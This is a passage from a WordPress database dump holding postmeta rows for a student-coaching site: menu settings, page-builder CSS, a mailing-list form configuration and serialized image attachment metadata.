!important;}'),(1587,2099,'_menu_item_type','post_type'),(1588,2099,'_menu_item_menu_item_parent','0'),(1589,2099,'_menu_item_object_id','8'),(1590,2099,'_menu_item_object','page'),(1591,2099,'_menu_item_target',''),(1592,2099,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1593,2099,'_menu_item_xfn',''),(1594,2099,'_menu_item_url',''),(1609,2101,'_wpb_shortcodes_custom_css','.vc_custom_1603932094448{padding-bottom: 15px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}'),(1617,2100,'wpforms_entries_count','2'),(1610,8,'_edit_last','1'),(1611,8,'_wp_page_template','default'),(1612,2102,'_wpb_shortcodes_custom_css','.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1603931138735{padding-top: 0px !important;padding-bottom: 0px !important;}'),(1613,8,'_wpb_shortcodes_custom_css','.vc_custom_1603932094448{padding-bottom: 15px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}'),(1656,2123,'_wp_attached_file','2021/02/SamDemma-Logo-FINAL.png'),(1626,2115,'_mc4wp_settings','a:9:{s:5:\"lists\";a:1:{i:0;s:10:\"3fa30c63d1\";}s:15:\"required_fields\";s:5:\"EMAIL\";s:12:\"double_optin\";s:1:\"1\";s:15:\"update_existing\";s:1:\"1\";s:17:\"replace_interests\";s:1:\"0\";s:15:\"subscriber_tags\";s:17:\"Waitlist, student\";s:18:\"hide_after_success\";s:1:\"0\";s:8:\"redirect\";s:0:\"\";s:3:\"css\";s:1:\"0\";}'),(1618,2105,'_wpb_shortcodes_custom_css','.vc_custom_1603932094448{padding-bottom: 15px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}'),(1669,2131,'_wp_attached_file','2021/02/cropped-SamDemma-Logo-SocialIcon-02.png'),(1670,2131,'_wp_attachment_context','site-icon'),(1671,2131,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:47:\"2021/02/cropped-SamDemma-Logo-SocialIcon-02.png\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"cropped-SamDemma-Logo-SocialIcon-02-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"cropped-SamDemma-Logo-SocialIcon-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:47:\"cropped-SamDemma-Logo-SocialIcon-02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:47:\"cropped-SamDemma-Logo-SocialIcon-02-512x500.png\";s:5:\"width\";i:512;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:47:\"cropped-SamDemma-Logo-SocialIcon-02-512x380.png\";s:5:\"width\";i:512;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:47:\"cropped-SamDemma-Logo-SocialIcon-02-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:47:\"cropped-SamDemma-Logo-SocialIcon-02-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:47:\"cropped-SamDemma-Logo-SocialIcon-02-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:47:\"cropped-SamDemma-Logo-SocialIcon-02-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:47:\"cropped-SamDemma-Logo-SocialIcon-02-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:47:\"cropped-SamDemma-Logo-SocialIcon-02-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:45:\"cropped-SamDemma-Logo-SocialIcon-02-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1675,2134,'_wpb_shortcodes_custom_css','.vc_custom_1612189656123{padding-top: 237px !important;padding-bottom: 237px !important;}'),(1676,2135,'_wpb_shortcodes_custom_css','.vc_custom_1612189769555{padding-top: 237px !important;padding-bottom: 237px !important;}'),(1679,2137,'_wpb_shortcodes_custom_css','.vc_custom_1612191669997{padding-top: 237px !important;padding-bottom: 237px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-80-1.png?id=2142) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}'),(1680,2138,'_wp_attached_file','2021/02/Untitled-design-80.png'),(1681,2138,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1792;s:6:\"height\";i:1195;s:4:\"file\";s:30:\"2021/02/Untitled-design-80.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Untitled-design-80-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"Untitled-design-80-1024x683.png\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-80-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"Untitled-design-80-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"Untitled-design-80-1536x1024.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-80-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:32:\"Untitled-design-80-1670x1114.png\";s:5:\"width\";i:1670;s:6:\"height\";i:1114;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:31:\"Untitled-design-80-1170x500.png\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:30:\"Untitled-design-80-880x380.png\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-80-880x587.png\";s:5:\"width\";i:880;s:6:\"height\";i:587;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-80-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-80-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-80-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1682,2139,'_wpb_shortcodes_custom_css','.vc_custom_1612191280467{padding-top: 237px !important;padding-bottom: 237px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-80.png?id=2138) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}'),(1683,2140,'_wp_attached_file','2021/02/Screen-Shot-2021-02-01-at-9.54.56-AM.png'),(1684,2140,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1068;s:6:\"height\";i:316;s:4:\"file\";s:48:\"2021/02/Screen-Shot-2021-02-01-at-9.54.56-AM.png\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"Screen-Shot-2021-02-01-at-9.54.56-AM-300x89.png\";s:5:\"width\";i:300;s:6:\"height\";i:89;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"Screen-Shot-2021-02-01-at-9.54.56-AM-1024x303.png\";s:5:\"width\";i:1024;s:6:\"height\";i:303;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2021-02-01-at-9.54.56-AM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2021-02-01-at-9.54.56-AM-768x227.png\";s:5:\"width\";i:768;s:6:\"height\";i:227;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2021-02-01-at-9.54.56-AM-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2021-02-01-at-9.54.56-AM-880x316.png\";s:5:\"width\";i:880;s:6:\"height\";i:316;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2021-02-01-at-9.54.56-AM-880x260.png\";s:5:\"width\";i:880;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2021-02-01-at-9.54.56-AM-450x316.png\";s:5:\"width\";i:450;s:6:\"height\";i:316;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2021-02-01-at-9.54.56-AM-450x133.png\";s:5:\"width\";i:450;s:6:\"height\";i:133;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2021-02-01-at-9.54.56-AM-450x316.png\";s:5:\"width\";i:450;s:6:\"height\";i:316;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1687,2142,'_wp_attached_file','2021/02/Untitled-design-80-1.png'),(1685,2141,'_wp_attached_file','2021/02/Untitled-design-81.png'),(1686,2141,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1792;s:6:\"height\";i:1195;s:4:\"file\";s:30:\"2021/02/Untitled-design-81.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Untitled-design-81-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"Untitled-design-81-1024x683.png\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-81-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"Untitled-design-81-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"Untitled-design-81-1536x1024.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-81-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:32:\"Untitled-design-81-1670x1114.png\";s:5:\"width\";i:1670;s:6:\"height\";i:1114;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:31:\"Untitled-design-81-1170x500.png\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:30:\"Untitled-design-81-880x380.png\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-81-880x587.png\";s:5:\"width\";i:880;s:6:\"height\";i:587;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-81-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-81-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-81-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1688,2142,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1792;s:6:\"height\";i:1195;s:4:\"file\";s:32:\"2021/02/Untitled-design-80-1.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"Untitled-design-80-1-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"Untitled-design-80-1-1024x683.png\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"Untitled-design-80-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"Untitled-design-80-1-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:34:\"Untitled-design-80-1-1536x1024.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:32:\"Untitled-design-80-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:34:\"Untitled-design-80-1-1670x1114.png\";s:5:\"width\";i:1670;s:6:\"height\";i:1114;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:33:\"Untitled-design-80-1-1170x500.png\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:32:\"Untitled-design-80-1-880x380.png\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:32:\"Untitled-design-80-1-880x587.png\";s:5:\"width\";i:880;s:6:\"height\";i:587;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:32:\"Untitled-design-80-1-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:32:\"Untitled-design-80-1-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:32:\"Untitled-design-80-1-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1691,2145,'_wpb_shortcodes_custom_css','.vc_custom_1612191669997{padding-top: 237px !important;padding-bottom: 237px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-80-1.png?id=2142) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}'),(1694,2148,'_wp_attached_file','2021/02/Untitled-design-82.png'),(1695,2148,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1792;s:6:\"height\";i:1195;s:4:\"file\";s:30:\"2021/02/Untitled-design-82.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Untitled-design-82-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"Untitled-design-82-1024x683.png\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-82-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"Untitled-design-82-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"Untitled-design-82-1536x1024.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-82-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:32:\"Untitled-design-82-1670x1114.png\";s:5:\"width\";i:1670;s:6:\"height\";i:1114;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:31:\"Untitled-design-82-1170x500.png\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:30:\"Untitled-design-82-880x380.png\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-82-880x587.png\";s:5:\"width\";i:880;s:6:\"height\";i:587;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-82-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-82-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-82-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1696,2149,'_wp_attached_file','2021/02/Untitled-design-83.png'),(1697,2149,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1792;s:6:\"height\";i:1195;s:4:\"file\";s:30:\"2021/02/Untitled-design-83.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Untitled-design-83-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"Untitled-design-83-1024x683.png\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-83-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"Untitled-design-83-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"Untitled-design-83-1536x1024.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-83-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:32:\"Untitled-design-83-1670x1114.png\";s:5:\"width\";i:1670;s:6:\"height\";i:1114;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:31:\"Untitled-design-83-1170x500.png\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:30:\"Untitled-design-83-880x380.png\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-83-880x587.png\";s:5:\"width\";i:880;s:6:\"height\";i:587;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-83-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-83-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-83-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1698,2150,'_wp_attached_file','2021/02/Untitled-design-84.png'),(1699,2150,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1792;s:6:\"height\";i:1195;s:4:\"file\";s:30:\"2021/02/Untitled-design-84.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Untitled-design-84-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"Untitled-design-84-1024x683.png\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-84-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"Untitled-design-84-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"Untitled-design-84-1536x1024.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-84-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:32:\"Untitled-design-84-1670x1114.png\";s:5:\"width\";i:1670;s:6:\"height\";i:1114;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:31:\"Untitled-design-84-1170x500.png\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:30:\"Untitled-design-84-880x380.png\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-84-880x587.png\";s:5:\"width\";i:880;s:6:\"height\";i:587;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-84-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-84-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-84-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\